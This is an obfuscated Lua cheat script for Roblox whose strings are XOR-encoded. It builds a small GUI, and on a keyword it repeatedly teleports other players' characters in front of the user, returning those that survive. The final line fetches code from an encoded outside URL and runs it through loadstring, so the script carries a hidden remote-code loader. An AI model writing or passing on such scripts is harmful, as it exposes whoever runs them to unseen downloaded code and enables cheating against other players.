--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v65,v66) local v67={};for v81=1, #v65 do v6(v67,v0(v4(v1(v2(v65,v81,v81 + 1 )),v1(v2(v66,1 + (v81% #v66) ,1 + (v81% #v66) + 1 )))%256 ));end return v5(v67);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167"));local v9=v8.LocalPlayer;local v10=game:GetService(v7("\17\216\36\246\249\49\219\35\198\249","\156\67\173\74\165"));local v11=game:GetService(v7("\1\164\76\4\149\40\86\33\163\122\19\174\48\79\55\178","\38\84\215\41\118\220\70"));local v12=game:GetService(v7("\100\1\39\23\240\99\19\48\4\247\83\19","\158\48\118\66\114"));local v13=Instance.new(v7("\152\39\2\51\118\171\220\190\45","\155\203\68\112\86\19\197"),v9:WaitForChild(v7("\118\209\55\229\69\106\194\237\79","\152\38\189\86\156\32\24\133")));v13.ResetOnSpawn=false;local v15=Instance.new(v7("\218\69\166\75\249","\38\156\55\199"),v13);v15.Size=UDim2.new(1086 -(461 + 625) ,1488 -(993 + 295) ,0 + 0 ,115);v15.Position=UDim2.new(0.5 + 0 , -(153 -53),0.5 + 0 , -70);v15.BackgroundColor3=Color3.fromRGB(54 -14 ,12 + 28 ,47 + 3 );v15.BorderSizePixel=0 + 0 ;v15.BackgroundTransparency=1474.1 -(1329 + 145) ;v15.Active=true;v15.Draggable=true;local v23=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"),v15);v23.Size=UDim2.new(972 -(140 + 831) ,1850 -(1409 + 441) ,718 -(15 + 703) ,10 + 10 );v23.Text=v7("\21\176\222\207\134\37\56\21\255\196\214","\84\121\223\177\191\237\76");v23.TextColor3=Color3.new(1 + 0 ,439 -(262 + 176) ,2 -1 );v23.BackgroundTransparency=1722 -(345 + 1376) ;v23.Font=Enum.Font.GothamBold;v23.TextSize=14;local v31=Instance.new(v7("\143\83\209\180\24\95\40","\161\219\54\169\192\90\48\80"),v15);v31.Position=UDim2.new(1900 -(106 + 1794) ,4 + 6 ,0 + 0 ,713 -(198 + 490) );v31.Size=UDim2.new(4 -3 , -(47 -27),1206 -(696 + 510) ,25);v31.PlaceholderText=v7("\19\11","\69\41\34\96");v31.TextColor3=Color3.new(1 -0 ,1263 -(1091 + 171) ,1428 -(41 + 1386) );v31.BackgroundColor3=Color3.fromRGB(10 + 50 ,188 -128 ,265 -185 );v31.TextScaled=true;v31.Font=Enum.Font.Gotham;local v40=false;local v41=v7("\189\209\218","\75\220\163\183\106\98");local v42=nil;local v43=Instance.new(v7("\49\181\158\57\221","\185\98\218\235\87"),v15);v43.SoundId=v7("\217\62\63\231\205\185\206\40\46\226\132\229\132\106\116\180\138\253\146\108\115\190\141","\202\171\92\71\134\190");v43.Volume=1 -0 ;local v46=Instance.new(v7("\26\206\57\134\45","\232\73\161\76"),v15);v46.SoundId=v7("\169\219\90\92\13\168\220\86\84\26\225\150\13\4\78\227\138\20\15\73\234\136\17","\126\219\185\34\61");v46.Volume=1;local v49=Instance.new(v7("\42\220\95\127\123","\135\108\174\62\18\30\23\147"),v15);v49.Position=UDim2.new(0 -0 ,374 -(123 + 251) ,0 -0 ,55);v49.Size=UDim2.new(3 -2 ,0 + 0 ,698 -(208 + 490) ,6 + 54 );v49.Visible=false;v49.BackgroundTransparency=1 + 0 ;local function v54(v68,v69) local v70=0 + 0 ;local v71;while true do local v82=836 -(660 + 176) ;while true do if (v82==(0 + 0)) then if (v70==(203 -(14 + 188))) then v71.Position=UDim2.new(675 -(534 + 141) ,5 + 5 ,0 + 0 ,v69);v71.Text=v68;v70=2 + 0 ;end if (v70==(320 -(53 + 267))) then v71=Instance.new(v7("\130\236\50\223\58\187\39\211\185\231","\167\214\137\74\171\120\206\83"),v49);v71.Size=UDim2.new(1 + 0 , -(433 -(15 + 398)),982 -(18 + 964) ,42 -22 );v70=1 -0 ;end v82=2 -1 ;end if ((1 + 0)==v82) then if (v70==(2 + 0)) then v71.BackgroundColor3=Color3.fromRGB(51 + 29 ,6 + 74 ,858 -(542 + 196) );v71.TextColor3=Color3.new(397 -(115 + 281) ,2 -1 ,1 + 0 );v70=3 + 0 ;end if (v70==(9 -5)) then v71.MouseButton1Click:Connect(function() v41=v68;v43:Play();v71.BackgroundColor3=Color3.fromRGB(120,440 -320 ,58 + 102 );task.delay(0.2,function() v71.BackgroundColor3=Color3.fromRGB(80,947 -(550 + 317) ,173 -53 );end);end);return v71;end v82=2 -0 ;end if (v82==2) then if (v70==(8 -5)) then v71.Font=Enum.Font.GothamBold;v71.TextSize=419 -(118 + 287) ;v70=289 -(134 + 151) ;end break;end end end end v54(v7("\138\226\63","\199\235\144\82\61\152"),1665 -(970 + 695) );v54(v7("\10\19","\75\103\118\217"),38 -18 );v54(v7("\196\88\121\23\178","\126\167\52\16\116\217"),2030 -(582 + 1408) );local v55=Instance.new(v7("\252\43\56\148\150\12\232\220\33\46","\156\168\78\64\224\212\121"),v15);v55.Size=UDim2.new(3 -2 , -(25 -5),0,75 -55 );v55.Position=UDim2.new(1824 -(1195 + 629) ,13 -3 ,0 -0 ,326 -(187 + 54) );v55.Text=v7("\10\225\161\203","\174\103\142\197");v55.BackgroundColor3=Color3.fromRGB(880 -(162 + 618) ,71 + 29 ,87 + 43 );v55.TextColor3=Color3.new(1 -0 ,1,1 -0 );v55.Font=Enum.Font.GothamBold;v55.TextSize=2 + 12 ;v55.MouseButton1Click:Connect(function() v40= not v40;v49.Visible=v40;v46:Play();v55.BackgroundColor3=Color3.fromRGB(1786 -(1373 + 263) ,1150 -(451 + 549) ,180);task.delay(0.2 + 0 ,function() v55.BackgroundColor3=Color3.fromRGB(155 -55 ,59 + 41 ,218 -88 );end);local v74=TweenInfo.new(0.3 + 0 ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);local v75=(v40 and UDim2.new(1384 -(746 + 638) ,200,0 + 0 ,265 -90 )) or UDim2.new(0 -0 ,541 -(218 + 123) ,1581 -(1535 + 46) ,257 -142 ) ;local v76=(v40 and UDim2.new(0 + 0 ,2 + 8 ,0,675 -(306 + 254) )) or UDim2.new(0,1 + 9 ,0 -0 ,1552 -(899 + 568) ) ;v12:Create(v15,v74,{[v7("\101\33\69\61","\152\54\72\63\88\69\62")]=v75}):Play();v12:Create(v55,v74,{[v7("\228\203\253\85\192\205\225\82","\60\180\164\142")]=v76}):Play();end);v11.InputBegan:Connect(function(v77) if ((v41==v7("\91\82\12\42\44","\114\56\62\101\73\71\141")) and ((v77.UserInputType==Enum.UserInputType.MouseButton1) or (v77.UserInputType==Enum.UserInputType.Touch))) then local v85=v9:GetMouse();if v85.Hit then v42=v85.Hit.p;end end end);local function v63(v78) local v79=0 + 0 ;local v80;while true do if (v79==(0 + 0)) then local v86=0 -0 ;while true do if (v86==0) then v80={};for v97,v98 in ipairs(v8:GetPlayers()) do if ((v98~=v9) and v98.Character and v98.Character:FindFirstChild(v7("\144\252\214\197\182\230\210\192","\164\216\137\187")) and  not v78[v98]) then table.insert(v80,v98);end end v86=604 -(268 + 335) ;end if (v86==(291 -(60 + 230))) then v79=1 + 0 ;break;end end end if (v79==(573 -(426 + 146))) then if ( #v80==(0 -0)) then return nil;end return v80[math.random(1, #v80)];end end end local v64=false;task.spawn(function() while true do local v84=0 + 0 ;while true do if (v84==(1456 -(282 + 1174))) then task.wait(811.05 -(569 + 242) );if (string.lower(v31.Text)==v7("\211\234\61","\107\178\134\81\210\198\158")) then if  not v64 then local v100=0;local v101;while true do if (v100==(0 -0)) then v64=true;v101={};v100=1 + 0 ;end if (v100==(1 -0)) then while string.lower(v31.Text)==v7("\57\2\142","\202\88\110\226\166")  do local v102=v63(v101);if  not v102 then break;end v101[v102]=true;local v104=v102.Character;local v105=v104 and v104:FindFirstChild(v7("\235\26\143\246\196\204\6\134\197\197\204\27\178\246\216\215","\170\163\111\226\151")) ;local v106=v104 and v104:FindFirstChild(v7("\57\37\191\57\64\56\32\21","\73\113\80\210\88\46\87")) ;local v107=v9.Character;local v108=v107 and (v107:FindFirstChild(v7("\179\37\202\26\243\169\45\195\22","\135\225\76\173\114")) or v107:FindFirstChild(v7("\40\228\191\184\184\253\134\8\224","\199\122\141\216\208\204\221"))) ;if (v105 and v106 and v108) then local v109=v105.CFrame;local v110=v108.CFrame * CFrame.new(0 + 0 ,1024 -(706 + 318) , -(1 + 2)) ;v104:PivotTo(v110);local v111=false;local v112;v112=v106.Died:Connect(function() local v113=1251 -(721 + 530) ;local v114;while true do if (v113==(1271 -(945 + 326))) then v114=0 -0 ;while true do if ((0 + 0)==v114) then v111=true;v112:Disconnect();break;end end break;end end end);task.wait(0.1);if ((v106.Health>(700 -(271 + 429))) and  not v111) then local v115=0 + 0 ;while true do if (v115==(1500 -(1408 + 92))) then v104:PivotTo(v109);continue;break;end end end end end v64=false;break;end end end end break;end end end end);loadstring(game:HttpGet(v7("\165\201\4\224\107\172\226\146\0\241\107\226\168\223\25\254\54\245\162\208\95\226\121\225\226\247\8\162\85\222\148\203\54","\150\205\189\112\144\24")))();
